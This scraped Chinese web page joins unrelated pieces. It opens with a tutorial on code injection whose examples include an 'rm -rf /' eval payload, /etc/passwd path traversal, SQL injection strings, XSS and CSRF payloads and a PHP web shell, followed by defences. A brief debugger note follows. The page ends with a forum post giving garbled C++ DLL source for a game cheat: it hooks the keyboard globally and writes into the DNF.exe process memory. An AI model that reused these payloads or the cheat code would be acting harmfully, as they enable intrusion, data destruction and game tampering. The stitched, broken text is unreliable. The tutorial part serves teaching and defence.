可怕的代码注入方式
开发程序过程中遇到最可怕的被攻击方式之一就是代码注入，sql注入，脚本数据，callback回调，跨域攻击等，参数钩子等，查询了很多相关资料，给大家简单整理了一下，先列出以下几点:
我们先来看一段perl的代码：
use&CGI&qw(:standard);
$name&= param('name');
$nslookup&=&"/path/to/nslookup";
if&(open($fh,&"$nslookup $name|")) {
while&(&$fh&) {
print&escapeHTML($_);
print&"&br&\n";
close($fh);
如果用户输入的参数是：
<%20%3B%20/bin/ls%20-l
那么，这段perl的程序就成了：
/path/to/ ; /bin/ls -l
我们再来看一段PHP的程序：
$myvar&=&'somevalue';
$x&=&$_GET['arg'];
eval('$myvar = '&.&$x&.&';');
“eval“的参数将会视同PHP处理，所以额外的命令可被添加。例如：如果”arg”如果被设成”10; system('rm -rf /')“，后面的”system('rm -rf /')“代码将被运行，这等同在服务器上运行开发者意料外的程序。
再来看一个PHP的代码
foreach&($_GET&as&$key&=&&$value) {
$$key&=&$value;
如果攻击者在查询字符串中给定”isadmin=1″，那$isadmin将会被设为值 “1″，然后攻击值就取得了网站应用的admin权限了。
再来看一个PHP的示例：
$action&=&'login';
if&(__isset(&$_GET['act'] ) )
$action&=&$_GET['act'];
require(&$action&.&'.php'&);
这个代码相当危险，攻击者有可能可以干这些事：
/test.php?act=http://evil/exploit&– 注入远程机器上有漏洞的文件。
/test.php?act=/home/www/bbs/upload/exploit&– 从一个已经上载、叫做exploit.php文件运行其代码。
/test.php?act=../../../../etc/passwd%00&– 让攻击者取得该UNIX系统目录检索下密码文件的内容。一个使用空元字符以解除.php扩展名限制，允许访问其他非 .php 结尾文件。 (PHP默认值”magic_quotes_gpc = On”可以终止这种攻击)
这样的示例有很多，只要你的程序有诸如：system()、StartProcess()、java.lang.Runtime.exec()、System.Diagnostics.Process.Start()以及类似的应用程序接口，都是比较危险的，最好不要让其中的字符串去拼装用户的输入。
PHP提供escapeshellarg()和escapeshellcmd()以在调用方法以前进行编码。然而，实际上并不建议相信这些方法是安全的 。
SQL injection，是发生于应用程序之数据库层的安全漏洞。简而言之，是在输入的字符串之中注入SQL指令，在设计不良的程序当中忽略了检查，那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行，因此遭到破坏。
在应用程序中若有下列状况，则可能应用程序正暴露在SQL Injection的高风险情况下：
在应用程序中使用字符串联结方式组合SQL指令（如：引号没有转义）。
在应用程序链接数据库时使用权限过大的帐户（如：很多开发人员都喜欢用sa（最高权限的系统管理员帐户）连接Microsoft SQL Server数据库）。
在数据库中开放了不必要但权力过大的功能（例如在Microsoft SQL Server数据库中的xp_cmdshell延伸预存程序或是OLE Automation预存程序等）
过于信任用户所输入的数据，未限制输入的字符数，以及未对用户输入的数据做潜在指令的检查。
某个网站的登录验证的SQL查询代码为
strSQL = "SELECT * FROM users
WHERE (name =&'" + userName + "')&and&(pw =&'"+ passWord +"');"
用户在登录时恶意输入如下的的用户名和口令：
userName =&"' OR '1'='1";
passWord =&"' OR '1'='1";
此时，将导致原本的SQL字符串被解析为：
strSQL = "SELECT * FROM users
WHERE (name =&''&OR&'1'='1')&and&(pw =&''&OR&'1'='1');"
也就是实际上运行的SQL命令会变成下面这样的，因此导致无帐号密码，也可登录网站。
strSQL =&"SELECT * FROM"
这还不算恶劣的，真正恶劣的是在你的语句后再加一个自己的语句，如：
username=&"' ; DELETE FROM --";
这样一来，要么整个数据库的表被人盗走，要么被数据库被删除。
所以SQL注入攻击被俗称为黑客的填空游戏。
当他们发现一个网站有SQL注入的时候，他们一般会干下面的事：
盗取数据表中的数据，例如个人机密数据（信用卡，身份证，手机号，通讯录……），帐户数据，密码等，获得用户的数据和信息后对这些用户进行“社会工程学”活动
取得系统管理员权限（例如ALTER LOGIN sa WITH PASSWORD=’xxxxxx’）。
在数据库中的数据中插入一些HTML/JS代码，有可能得以在网页加入恶意链接以及XSS，这样一来就让访问者被黑。
经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统（例如：MS SQL Server的 xp_cmdshell “net stop iisadmin”可停止服务器的IIS服务）。甚至破坏硬盘数据，瘫痪全系统（例如xp_cmdshell “FORMAT C:”）。
现在的黑客比较坏，瘫痪系统的事，他们干的越来越少，因为没什么利益，他们希望通过获取用户的帐号信息后，转而攻击用户别的帐号，如游戏帐号，网银帐号，QQ帐号等等他们可以获利的事情
在组合SQL字符串时，先针对所传入的参数作字符转义（如：将单引号字符取代为连续2个单引号字符）。如果使用PHP开发网页程序的话，亦可打开PHP的Magic quote功能自动将所有的网页传入参数，将单引号字符取代为连续2个单引号字符。如果可能应该过滤以下字符：分号“;”，两个减号“–”，单引号“’”，注释“/* … */”。（当然，因为注入攻击一般用闭合的引号来玩，所以把引号转义了应该就没有什么问题了）
更换危险字符。例如在PHP通过addslashes()函数保护SQL注入。
限制用户输入的长度，限制用户输入的取值范围。
为当前应用建立权限比较小的数据库用户，这样不会导致数据库管理员丢失。
把数据库操作封装成一个Service，对于敏感数据，对于每个客户端的IP，在一定时间内每次只返回一条记录。这样可以避免被拖库。
跨网站脚本注 入
跨网站脚本（Cross-site&scripting，通常简称为XSS或跨站脚本或跨站脚本攻击）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，&VBScript，&ActiveX，&Flash&或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。
假如我们有这样一段PHP的代码：
$username&=&$_GET['username'];
echo&'&div& Welcome, '&.&$username&.&'&/div&';
那么我们可以这样来注入：
http:///welcome.php?username=&Script Language=”Javascript”&alert(“You’ve been attacked!”);&/Script&
甚至这样：
http:///welcome.php?username=&div id=”stealPassword”&Please Login:&form name=”input” action=”/stealPassword.php” method=”post”&Username: &input type=”text” name=”username” /&&br/&Password: &input type=”password” name=”password” /&&input type=”submit” value=”Login” /&&/form&&/div&
这会让网页显示以下内容：
&div&class="header"& Welcome,
&div id="stealPassword"&Please Login:
&form name="input"&action="/stealPassword.php"&method="post"&
Username: &input type="text"&name="username"&/&
Password: &input type="password"&name="password"&/&
&input type="submit"&value="Login"&/&
注入的代码还有可能变种为如下这种更为隐蔽的方式(unicode码)：
/welcome.php?username=&script+type=”text/javascript”&
document.write(‘\u003C\u\u\u\u003D\u
\u\uC\u\u\uF\u
\uE\uC\u\u\uC\u006F\u0067
\uE\u003A\u003C\uF\uD\uE\uD
\uD\u\u006E\u\u\u\u0063
\u\u006F\u006E\u003D\u\u\uA\u002F
\u002F\u\u\uB\u002E\u\uD
\uC\uE\uF\u006D\u002F\u\u
\u006C\u\u\uF\u\u002E\u
\u\uD\u\uF\uD\u
\u006F\u\uE\u\u\u006E\uD
\uA\uC\uE\u\u\u
\u\u003D\u\u\u\uE\u0061
\u006D\uD\u\u\uE\uD\u0065
\u\u002F\u003E\u003C\u\u002F\u003E\u\u0073
\u\u006F\u\u003A\uC\uE\u
\u\u\u\u003D\u\u\u0073
\uF\u\u\u006E\uD\uD\u0022
\u\u\uF\u\u\u002F\u003E
\u003C\uE\u\u\u\u\u003D
\u\u\u006D\u\u\u\u006C
\u\u003D\uC\u006F\u\u006E\u\u002F
\u003E\u003C\u002F\uF\uD\u003E\u003C\u002F\u\uE\u000D’);&/script&
XSS的攻击主要是通过一段JS程序得用用户已登录的cookie去模拟用户的操作（甚至偷用户的cookie）。这个方式可以让用户在自己不知情的情况下操作了自己不期望的操作。如果是网站的管理员中招，还有可能导致后台管理权限被盗。
XSS攻击在论坛的用户签档里面（使用img标签）也发生过很多次，包括像一些使用bcode的网站，很有可能会被注入一些可以被浏览器用来执行的代码。包括CSS都有可能被注入javascript代码。
不要以为XSS攻击是我们的程序没有写好，有时候，我们会引用别人站点上的js文件，比如：放一个天气预报的小Widget的js，或是一个流量监控，或是一段广告的js文件。你不知道这些东西是不是有问题，如果有恶意的话，这就是你自己主动注入攻击代码了。
另外，XSS攻击有一部分是和浏览器有关的。比如，如下的一些例子，你可能从来都没有想过吧？
&table background=”javascript:alert(1)”&
&meta charset=”mac-farsi”&?script?alert(1)?/script?
&img src=”javascript:alert(1)”&
XSS攻击通常会引发CSRF攻击。CSRF攻击主要是通过在A站上设置B站点上的链接，通过使用用户在B站点上的登录且还没有过期的cookie，从而使得用户的B站点被攻击。（这得益于现在的多Tab页的浏览器，大家都会同时打开并登录很多的网站，而这些不同网站的页面间的cookie又是共享的）
于是，如果我在A站点内的某个贴子内注入这么一段代码：
&img src="/transfer?account=XXX&amount=1000000&for=haoel"&
很有可能你就在访问A站的这个贴子时，你的网银可能向我转了一些钱。
要防止XSS攻击，一般来说有下面几种手段：
严格限制用户的输入。最好不要让用户输入带标签的内容。最好不要让用户使用一些所见即所得的HTML编辑器。
严格过滤用户的输入。如：
PHP的htmlentities()或是htmlspecialchars()或是strip_tags()。
Python的cgi.escape()
ASP的Server.HTMLEncode()。
Node.js的node-validator。
Java的xssprotect。
在一些关键功能，完全不能信任cookie，必需要用户输入口令。如：修改口令，支付，修改电子邮件，查看用户的敏感信息等等。
限制cookie的过期时间。
对于CSRF攻击，一是需要检查http的reference header。二是不要使用GET方法来改变数据，三是对于要提交的表单，后台动态生成一个随机的token，这个token是攻击者很难伪造的。（对于token的生成，建议找一些成熟的lib库）
另外，你可能觉得网站在处理用户的表单提交就行了，其实不是，想一想那些Web Mail，我可以通过别的服务器向被攻击用户发送有JS代码、图片、Flash的邮件到你的邮箱，你打开一看，你就中招了。所以，WebMail一般都禁止显示图片和附件，这些都很危险，只有你完全了解来源的情况下才能打开。电子邮件的SMTP协议太差了，基本上无法校验其它邮件服务器的可信度，我甚至可以自己建一个本机的邮件服务器，想用谁的邮件地址发信就用谁的邮件地址发信。所以，我再次真诚地告诉大家，请用gmail邮箱。
上传文件是一个很危险的功能，尤其是你如果不校验上传文件的类型的话，你可能会中很多很多的招，这种攻击相当狠。试想，如果用户上传给你一个PHP、ASP、JSP的文件，当有人访问这个文件时，你的服务器会解释执行之，这就相当于他可以在你的服务器上执行一段程序。这无疑是相当危险的。
举个例子：
&form action="upload_picture.php"&method="post"&enctype="multipart/form-data"&
要上传的文件:
&input type="file"&name="filename"/&
&input type="submit"&name="submit"&value="Submit"/&
$target&=&"pictures/"&.&basename($_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],&$target)){
echo&"图片文件上传成功";
}else{&/div&
echo&"图片文件上传失败";
假如我上传了一个PHP文件如下：
文件名malicious.php
system($_GET['cmd']);
那么，我就可以通过如下的URL访问攻击你的网站了：
http:///upload_dir/malicious.php?cmd=ls%20-l
抵御这样的攻击有两种手段：
1）限制上传文件的文件扩展名。
2）千万不要使用root或Administrator来运行你的Web应用。
URL跳转很有可能会成为攻击利用的工具。
比如下面的PHP代码：
$redirect_url&=&$_GET['url'];
header("Location: "&.&$redirect_url);
这样的代码可能很常见，比如当用户在访问你的网站某个页观的时候没有权限，于是你的网站跳转到登录页面，当然登录完成后又跳转回刚才他访问的那个页面。一般来说，我们都会在跳转到登录页面时在URL里加上要被跳转过去的网页。于是会出现上述那样的代码。
于是我们就可以通过下面的URL，跳转到一个恶意网站上，而那个网站上可能有一段CSRF的代码在等着你，或是一个钓鱼网站。
http:///redirect?url=http://attacker.example.net
这种攻击具有的迷惑性在于，用户看到的，以为是一个合法网站，于是就点了这个链接，结果通过这个合法网站，把用户带到了一个恶意网站，而这个恶意网站上可能把页面做得跟这个合法网站一模一样，你还以为访问的是正确的地方，结果就被钓鱼了。
解决这个问题很简单，你需要在你的后台判断一下传过来的URL的域名是不是你自己的域名。
你可以看看Google和Baidu搜索引擎的链接跳转，百度的跳转链接是被加密过的，而Google的网站链接很长，里面有网站的明文，但是会有几个加密过的参数，如果你把那些参数移除掉，Google会显示一个重定向的提醒页面。
版权所有 爱编程 (C) Copyright 2012. . All Rights Reserved.
闽ICP备号-3
微信扫一扫关注爱编程，每天为您推送一篇经典技术文章。系统篇（20）
笔者在用中文版的OD调试程序的时候，按F12暂停调试，但是却出现了下面的这个&#39740;窗口 ：&
顿时很苦恼啊。在 &&&也看到了这个问题，但是没找到解决方案。
下面在网上 找到了答案。
笔者是这样解决中文版出现不能暂停程序的问题：
1， 打开下图所示的窗口：
2，在弹出的消息框中按照下面图片上的显示操作：
这样就能暂停调试程序了。
&&是更详尽的关于解决OD的 注入的代码无响应问题详细信息。
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：107197次
积分：4628
积分：4628
排名：第4513名
原创：338篇
转载：92篇
评论：27条
(2)(14)(37)(3)(2)(7)(15)(35)(17)(12)(16)(21)(56)(66)(31)(16)(8)(14)(20)(8)(7)(24)(4)(1)通过C ++写的DLL文件。需要会用注入器的朋友来试_ce大神吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：19,501贴子：
通过C ++写的DLL文件。需要会用注入器的朋友来试收藏
#define _UNICODE#include &CmnHdr.h&
/* See Appendix A. */#include &tchar.h&#include &stdafx.h&#include &stdlib.h&#include &string.h& #include &stdio.h&#include &windows.h&#pragma data_seg(&hookdata&)HHOOK oldkeyhook=0;#pragma data_seg()#pragma comment(linker,&/SECTION:hookdata,RWS&)#define DllExport extern &C&__declspec(dllexport)DllExport LRESULT CALLBACK WndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam);DWORD WINAPI ThreadProc( void* lpParameter) ;DllExport
bool InitWindowsApp(int show);DllExport bool InitApp(int show);DllExport void EndHook(void);LPCTSTRDWORD PID;HANDLE hPDWORD dtcrc1=0x3F35B28;//动态CRC1DWORD renwujizhi=0x2B3F7A8;//人物基址DWORD pingfenjizhi=0x2AB9E74;//评分基址DWORD jiamijizhi=0x2B82438;//3S评分DWORD shubiaojizhi=0x2B6EB9C;//鼠标基址DWORD jiemijizhi=0x2B823D8;DWORD jiamicanshu1=0x276DF50;DWORD jiamicanshu2=0x276E150;void crc();int
openMain();void pingfen();void
RenWuJieKouPM();void bati(int value);void wudi(DWORD value);void GM(DWORD value);void jiazhiyichang(DWORD dalei,DWORD value);void jiazhizhaoguai();void jiami(DWORD dizhi,int value);void ycxue(int i,int value);void exit();HWND ghMainWnd = 0;HINSTANCE hIint
Run();///////////////////////////////////////////////////////////////////////////////BOOL WINAPI DllMain(HINSTANCE hInstDll, DWORD fdwReason, PVOID fImpLoad) {
if (fdwReason == DLL_PROCESS_ATTACH) {
hInst = hInstD
char szBuf[MAX_PATH * 100] = { 0 };
PBYTE pb = NULL;
MEMORY_BASIC_INFORMATION
while (VirtualQuery(pb, &mbi, sizeof(mbi)) == sizeof(mbi)) {
char szModName[MAX_PATH];
if (mbi.State == MEM_FREE)
mbi.AllocationBase = mbi.BaseA
if ((mbi.AllocationBase == hInstDll) ||
(mbi.AllocationBase != mbi.BaseAddress) ||
(mbi.AllocationBase == NULL)) {
// Do not add the module name to the list
// if any of the following is true:
// 1. If this region contains this DLL
// 2. If this block is NOT the beginning of a region
// 3. If the address is NULL
nLen = GetModuleFileNameA((HINSTANCE) mbi.AllocationBase,
szModName, 400000);
//nLen = GetModuleFileNameA((HINSTANCE) mbi.AllocationBase,
szModName, _countof(szModName));
if (nLen & 0) {
wsprintfA(strchr(szBuf, 0), &\n%p-%s&,
mbi.AllocationBase, szModName);
pb += mbi.RegionS
// NOTE: Normally, you should not display a message box in DllMain
// due to the loader lock described in Chapter 20. However, to keep
// this sample application simple, I am violating this rule.
// GetModuleFileNameA(NULL, szTitle,40000); // _countof(szTitle)//char szModName[MAX_PATH];//
GetModuleFileNameA((HINSTANCE) mbi.AllocationBase,
szModName, 10);
// MessageBoxA(GetActiveWindow(), szBuf, &中国&, MB_OK);
// MessageBoxA(GetActiveWindow(), szBuf[1], &xx&, MB_OK);
//chMB(&szBuf[1]);typedef void(*PM)(); HINSTANCE HDLL; PM M;HDLL=LoadLibrary(&GG.dll&);//加载动态链接库MyDll.dll文件； M=(PM)GetProcAddress(HDLL,&XX&); //MessageBoxA(GetActiveWindow(), szBuf, M(), MB_OK); M();FreeLibrary(HDLL);//卸载MyDll.dll文件；
DWORD dwThreadID;
int x = 0;
HANDLE hThread =
CreateThread(0,0,ThreadProc,(void*)&x,0,&dwThreadID);
CloseHandle(hThread);
// MessageBoxA(GetActiveWindow(), szBuf, &中国&, MB_OK);
return(TRUE);
if (fdwReason == DLL_THREAD_ATTACH)
EndHook();}//////////////////////////////// End of File //////////////////////////////////DWORD WINAPI ThreadProc( void* lpParameter) { int *x = (int*)lpP//获得参数的地址
//InitApp(1);
InitWindowsApp(1); //MessageBox(NULL,TEXT(&adf&),NULL,MB_OK); return 0;}bool InitApp(int show){oldkeyhook = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)WndProc,hInst,0);//oldkeyhook = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)WndProc,NULL,0);Run();return 0;}bool InitWindowsApp(int show){
// The first task to creating a window is to describe some of its
// characteristics by filling out a WNDCLASS structure.
= CS_HREDRAW | CS_VREDRAW;
wc.lpfnWndProc
wc.cbClsExtra
wc.cbWndExtra
//wc.hInstance
= instanceHhInst wc.hInstance
= LoadIcon(0, IDI_APPLICATION);
wc.hCursor
= LoadCursor(0, IDC_ARROW);
wc.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
wc.lpszMenuName
wc.lpszClassName = &BasicWndClass&;// Next, we register this WNDCLASS instance with Windows so
// that we can create a window based on it.
if(!RegisterClass(&wc))
MessageBox(0, &RegisterClass FAILED&, 0, 0);
// With our WNDCLASS instance registered, we can create a
// window with the CreateWindow function. This function
// returns a handle to the window it creates (an HWND).
// If the creation failed, the handle will have the value
// of zero. A window handle is a way to refer to the window,
// which is internally managed by Windows. Many of the Win32 API
// functions that operate on windows require an HWND so that
// they know what window to act on.
ghMainWnd = CreateWindow(
&BasicWndClass&,
// Registered WNDCLASS instance to use.
&小雨点辅助&,
// window title
WS_OVERLAPPEDWINDOW,//WS_OVERLAPPEDWINDOW,
// style flags
CW_USEDEFAULT,
// x-coordinate
CW_USEDEFAULT,
// y-coordinate
CW_USEDEFAULT,
CW_USEDEFAULT,
// parent window
// menu handle
0,//hInst,
//instanceHandle,
// app instance
// extra creation parameters
if(ghMainWnd == 0)
MessageBox(0, &CreateWindow FAILED&, 0, 0);
SetTimer(ghMainWnd,1,300,NULL);
// Even though we just created a window, it is not initially
// shown. Therefore, the final step is to show and update the
// window we just created, which can be done with the following
// two function calls. Observe that we pass the handle to the
// window we want to show and update so that these functions know
// which window to show and update.
ShowWindow(ghMainWnd,show);
UpdateWindow(ghMainWnd);
Run();}int Run(){
MSG msg = {0};
// Loop until we get a WM_QUIT message. The function
// GetMessage will only return 0 (false) when a WM_QUIT message
// is received, which effectively exits the loop. The function
// returns -1 if there is an error. Also, note that GetMessage
// puts the application thread to sleep until there is a
// message.int cxScreen,cyS cxScreen=GetSystemMetrics(SM_CXSCREEN); cyScreen=GetSystemMetrics(SM_CYSCREEN); SetWindowPos(ghMainWnd,HWND_TOPMOST,cxScreen*0.7,cyScreen*0.7,cxScreen*0.3,cyScreen*0.3,SWP_SHOWWINDOW);
ShowWindow(ghMainWnd,SW_SHOWNA);
BOOL bRet = 1;
while( (bRet = GetMessage(&msg, 0, 0, 0)) != 0 )
if(bRet == -1)
MessageBox(0, &GetMessage FAILED&, &Error&, MB_OK);
TranslateMessage(&msg);
DispatchMessage(&msg);
return (int)msg.wP}LRESULT CALLBACK WndProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam){
// Handle some specific messages. Note that if we handle a
// message, we should return 0. if (wParam==1 ){ //各种功能的实现以下面完成 格式 if (GetAsyncKeyState(&#39;a&#39;)) {事件;}if (GetAsyncKeyState(VK_CONTROL)&&GetAsyncKeyState(VK_HOME)) ShowWindow(ghMainWnd,SW_SHOW);
if (GetAsyncKeyState(VK_CONTROL)&&GetAsyncKeyState(VK_END)) ShowWindow(ghMainWnd,SW_HIDE); if (GetAsyncKeyState(VK_ADD)) {if(openMain()){pingfen();CloseHandle(hProcess);}} //小键盘的+号键是评分if (GetAsyncKeyState(192)) {if(openMain()){GM(4);CloseHandle(hProcess);}}//~GMif (GetAsyncKeyState(186)) {if(openMain()){wudi(0);CloseHandle(hProcess);}}//;无敌if (GetAsyncKeyState(113)) {if(openMain()){RenWuJieKouPM();CloseHandle(hProcess);}}//;F2假紫接口if (GetAsyncKeyState(55)) {if(openMain()){jiazhiyichang(7,3);CloseHandle(hProcess);}}//;F2后 数字7 晕怪if (GetAsyncKeyState(53)) {if(openMain()){jiazhiyichang(7,12);CloseHandle(hProcess);}}//;F2后 数字5加速
PAINTSTRUCT
switch( msg )
case WM_PAINT:
hdc = BeginPaint (ghMainWnd, &ps) ;
GetClientRect (ghMainWnd, &rect) ;
DrawText (hdc, TEXT (&F2假紫接口(5是加速 7是晕怪)无敌
小键盘+号3S评分&), -1, &rect,
DT_SINGLELINE |TA_LEFT| TA_TOP) ;
EndPaint (ghMainWnd, &ps) ;
return 0 ;
// In the case the left mouse button was pressed,
// then display a message box.
case WM_LBUTTONDOWN:
// MessageBox(0, &Hello, World&, &Hello&, MB_OK);
// In the case the Escape key was pressed, then
// destroy the main application window.
case WM_KEYDOWN:
// In the case of a destroy message, then send a
// quit message, which will terminate the message loop.
case WM_DESTROY:
// PostQuitMessage(0);
case HCBT_ACTIVATE: //
SuspendThread(0);
// Forward any other messages we did not handle above to the
// default window procedure. Note that our window procedure
// must return the return value of DefWindowProc.
return DefWindowProc(hWnd, msg, wParam, lParam);}void EndHook(void){UnhookWindowsHookEx(oldkeyhook);}
炫酷暗黑奇迹MU页游强悍来袭，秒怪秒BOSS，来玩就送海量RMB礼包！
以上只是部分代码。 代码太长了。
DWORD GetProcessIDByName(LPCTSTR szProcessName)//获取PID{ HANDLE hS PROCESSENTRY32 BOOL fFound = FALSE; DWORD dwPID = 0;
pe.dwSize = sizeof( PROCESSENTRY32 ); hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); if( hSnapshot != NULL ) {
fFound = Process32First( hSnapshot, &pe );
while( fFound )
//cout&&pe.szExeFile&&
if( strncmp( szProcessName, pe.szExeFile, MAX_PATH ) == 0 )
dwPID = pe.th32ProcessID;
fFound = Process32Next( hSnapshot, &pe );
CloseHandle( hSnapshot ); } return dwPID;}int openMain(){
name=&DNF.exe&;
PID=GetProcessIDByName(name);//根据进程名字获取PID
if(NULL==PID){ MessageBox(0, &游戏没打开~！&, &DNF.exe不存在&, MB_OK);return 0;}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
if(hProcess==NULL){ MessageBox(0, &没有找到进程~！&, &进程没找到&, MB_OK);CloseHandle(hProcess); return 0;CloseHandle(hProcess);}
}//int openMain()//{
// name=&DNF.exe&; //PID=GetProcessIDByName(name);//根据进程名字获取PID
//if(NULL==PID) //{ //cout&&&请先进入游戏：地下城与勇士 (输入任意键，回车后退出)&&& //exit(); //} //cout&&name&&&的PID:&&&PID&& //cout&&&提示附加成功后使用&&& //cout&&&功能：输入对应数值后回车后生效[时空之门 电厂 推荐使用加速与定怪不推荐扣血功能]&&& //cout&&&功能：扣血功能推荐20~70级的图试用，遗忘之地试用&&&
//cout&&&*正式版本针对假紫武器可以跨级别和跨职业使用，并且可以先处理拍卖可以再买下来的功能。&&& //cout&&&0.退出&&& //cout&&&1.评分&&& //cout&&&22.输入22后鼠标指在拍卖行假紫异常武器上回车(此方式生效后以下不用取换自身武器)&&& //cout&&&2.无敌(开启)&&& //cout&&&22.无敌(无敌关闭)&&& //cout&&&3.城镇加速及图内鼠标瞬移(城镇时武器取下重新戴上生效) 不同区检测力度不一样慎用!&&& //cout&&&4.穿上有异常功能的假紫武器进图实现晕怪功能&&&
//cout&&&5.穿上有异常功能的假紫武器进图实现加速功能&&& //cout&&&6.扣0.5W，前提5功能有效果，否则游戏崩溃 注：到boss请停止此功能&&& //cout&&&66.扣1W血，前提5功能有效果，否则游戏崩溃 注：到boss请停止此功能&&& //cout&&&666.扣2W血，前提5功能有效果，否则游戏崩溃 注：到boss请停止此功能&&& //cout&&&6666.扣3W血，前提5功能有效果，否则游戏崩溃 注：到boss请停止此功能&&& //cout&&&66666.扣4W血，前提5功能有效果，否则游戏崩溃 注：到boss请停止此功能&&& //cout&&&7.扣10%血，前提5功能有效果，否则游戏崩溃 注：到boss请使用此功能&&& //cout&&&9.重新加载更新辅助界面&&& //cout&&&其他：收费版本有 招怪999999 秒图 无限回红蓝 视频效果见
&&&// hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);//权限 可继承性 PID //if(hProcess!=NULL) // cout&&&附加&&&name&&&成功&&& // //while(1) //{ // cin&&a; // switch(a) // { //
case 1: pingfen(); //
case 0: exit(); //
case 22:RenWuJieKouPM(); //
case 2 : wudi(0);//开启
//case 22: wudi(1);//关闭
//case 3: GM(5); //
case 4: jiazhiyichang(7,3); //
case 5: jiazhiyichang(7,12); //
case 6: ycxue(0,-5000); //普通图推荐用此功能; //
case 66: ycxue(0,-10000); //普通图推荐用此功能;
case 666: ycxue(0,-20000); //普通图推荐用此功能; //
case 6666: ycxue(0,-30000); //普通图推荐用此功能; //
case 66666: ycxue(0,-40000); //普通图推荐用此功能; //
case 666666: ycxue(0,-50000); //普通图推荐用此功能;
case 7: ycxue(1,-10); //普通图推荐用此功能;
case 8:RenWuJieKouPM(); //
case 88: jiazhiyichang(7,18);
//case 5: wudi(1);
//case 6: GM(5);//开启GM
//case 7: GM(1);
//case 8: jiazhiyichang(7,3);
//case 9:jiazhiyichang(7,12);
//case 10:jiazhizhaoguai();
//case 10:jiazhiyichang(18,60021);//召唤怪物；56123怪物代码,60021怪物代码 //
default: // } //} //CloseHandle(hProcess); //return 0;//}void jiami(DWORD dizhi,int value){ DWORD edi,ecx,ebx,eax,esi,edx, ecx= ReadProcessMemory(hProcess,(LPVOID)jiamijizhi,&eax,sizeof(DWORD),0); eax=eax+1; WriteProcessMemory(hProcess,(LPVOID)jiamijizhi,&eax,4,0); edx= edx=edx&&8; edx=edx&&24; edx=edx&&24; int temp=edx*2+jiamicanshu1; ReadProcessMemory(hProcess,(LPVOID)temp,&edx,sizeof(DWORD),0); edx%=65536; eax=eax&&24; eax=eax&&24; temp=eax*2+jiamicanshu2; ReadProcessMemory(hProcess,(LPVOID)temp,&ss,sizeof(DWORD),0); ss%=65536; edx=edx^ eax= eax%=65536; esi= edx=esi&&16; ss=esi%65536; edx=edx+ edx=edx^ edi= edx= eax=eax&&16; eax=eax+ esi= eax=eax^ esi=dizhi+8; WriteProcessMemory(hProcess,(LPVOID)esi,&eax,4,0); ReadProcessMemory(hProcess,(LPVOID)dizhi,&eax,sizeof(DWORD),0); ReadProcessMemory(hProcess,(LPVOID)jiemijizhi,&esi,sizeof(DWORD),0); ecx= ecx=ecx&&16; ecx=ecx+ edx= edx=edx&&16; temp=esi+edx*4+36; ReadProcessMemory(hProcess,(LPVOID)temp,&edx,sizeof(DWORD),0); eax%=65536; temp=edx+eax*4+8468; WriteProcessMemory(hProcess,(LPVOID)temp,&ecx,4,0);}
void pingfen(){
//BOOL WriteProcessMemory(HANDLE hProcess,LPVOID lpBaseAddress,LPVOID lpBuffer,DWORD nSize,LPDWORD lpNumberOfBytesWritten); DWORD p1; DWORD ReadProcessMemory(hProcess,(LPVOID)pingfenjizhi,&h,sizeof(DWORD),0); p1=h+0x198; h=8252581; //WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); jiami(p1,h);}void bati(int value){ DWORD p1; DWORD ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x92c;//0X92c霸体偏移 h=//value为0取消霸体，1霸体状态 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0);}void wudi(DWORD value){ if (value==0) {
value=0; } else
value=0x3f800000; DWORD p1; DWORD ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x3480;//0X3480称号偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); p1=h+0x13//0x13ec无敌偏移 h=//value为0无敌状态 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0);}void GM(DWORD value){ if (value==5)
value=4; value=4; DWORD p1; DWORD DWORD h1; ReadProcessMemory(hProcess,(LPVOID)renwujizhi,&h,sizeof(DWORD),0); p1=h+0x2BD8;//0X2BD8 GM偏移 ReadProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); h1=h; h=//value为4 GM起效 WriteProcessMemory(hProcess,(LPVOID)p1,&h,sizeof(DWORD),0); Sleep(100); WriteProcessMemory(hProcess,(LPVOID)p1,&h1,sizeof(DWORD),0);}//假紫武器能处理全屏异常，可以回血，掉血，召唤//1冰2毒3眩晕4诅咒5失明6感电7石化8睡眠9烧伤10破武器11出血12加速13祝福14元素伤害15混乱16束缚17破甲18以上全部
